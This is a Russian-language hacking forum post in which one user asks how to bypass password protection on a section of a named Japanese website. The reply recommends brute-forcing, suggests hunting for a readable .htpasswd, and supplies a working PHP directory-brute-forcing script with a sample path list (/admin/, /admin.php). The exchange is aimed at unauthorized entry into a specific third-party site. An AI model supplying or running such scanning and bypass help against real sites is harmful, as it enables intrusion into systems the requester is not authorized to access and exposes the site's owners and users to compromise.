ANTICHAT - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Цитата:

Сообщение от guspertiz

Всем привет,
у меня такой вопрос есть японский сайт http://www.104club.info/
там есть подраздел http://www.104club.info/indicator
но при переходе он требует логин и пароль, кто может подсказать как его обойти?
Заранее спасибо

Обойти можно, как правильно подметил nemaniak, только брутом. Попробуй просканить сайтец на полезные файлы/папки, авось и .htpasswd доступен для чтения

. Может че найдешь.

Лови скриптик на скорую руку

PHP код:


		
			
<form action='<?=$_SERVER[PHP_SELF]?>' method='POST'>

<pre>

URL without ending slash!:<a href='#' title='exmpl: http://www.site.com' style='text-decoration: none'>?</a><input type='text' name='host' size='50' /><br/>

File with dirs:<a href='#' title='exmpl: dirs.txt (with Path)' style='text-decoration: none'>?</a> <input type='text' name='dirs'  size='50' value='./dirs.txt'/><br/>

<input type='submit' name='gogo' value='Scan' />

</pre>

</form>

<hr/>

<?php

if($_POST['gogo'] && trim($_POST['host']) != '' && trim($_POST['dirs']) != ''){

    $host = $_POST['host'];

    $dirs = @file($_POST['dirs']);

    if (!$dirs) die ('Can`t open file');

    foreach ($dirs as $v){

        $temp = @get_headers($host.trim($v));

        $found = false;

        if (preg_match('#200#', $temp[0])) {echo $host.'<b>'.$v.'</b> found! <br/>';}

        if (preg_match('#403#', $temp[0])) {echo $host.'<b>'.$v.'</b> is forbidden! <br/>';}

        if (preg_match('#404#', $temp[0])) { continue;}

    }



} else if ($_POST['gogo'] && (trim($_POST['host']) == '' || trim($_POST['dirs']) == '')) {

die('All fields required');

}

?>

Файл dirs должен быть вот такого вида:
/admin/
/admin.php
/indicator
...